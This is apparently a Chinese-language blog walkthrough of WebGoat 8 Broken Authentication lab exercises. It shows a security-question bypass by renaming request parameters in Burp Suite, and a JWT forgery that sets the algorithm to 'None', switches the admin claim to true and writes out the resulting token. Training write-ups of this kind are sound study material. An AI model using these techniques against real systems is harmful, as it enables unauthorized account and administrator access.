1.Authentication Bypasses
输入框随意输入:test,test
点击Submit,并使用Burpsuite抓包
Action–>Repeater
修改参数名为secQuestion3和secQuestion4
2.JWT tokens
切换账户,点击VoteNow!,使用burp抓包,发现Jerry用户的时候,access_token有值,其他用户access_token都为空
使用burpsuite抓包
然后对获取的token解密
eyJhbGciOiJIUzUxMiJ9
eyJpYXQiOjE1OTIwNjU0NDcsImFkbWluIjoiZmFsc2UiLCJ1c2VyIjoiVG9tIn0
通过解密发现:
签名算法用的HS512,账户是tom,admin角色是false
然后修改token为:
{“alg”:“None”}
{“iat”:1561483507,“admin”:“true”,“user”:“Tom”}
然后重新base64加密后组合:
eyJhbGciOiJOb25lIn0=.eyJpYXQiOjE1NjE0ODM1MDcsImFkbWluIjoidHJ1ZSIsInVzZXIiOiJUb20ifQ==.12mESLnp73XGTGaYm4cxNxAmwAV0UM5eW7-KLSzmVcmUt1Zz_cpzC2FU8vR4ouJyHIRHantfJIcNGli_YAOOLQ;
Webgoat8(A2) Broken Authentication
最新推荐文章于 2023-09-16 23:45:46 发布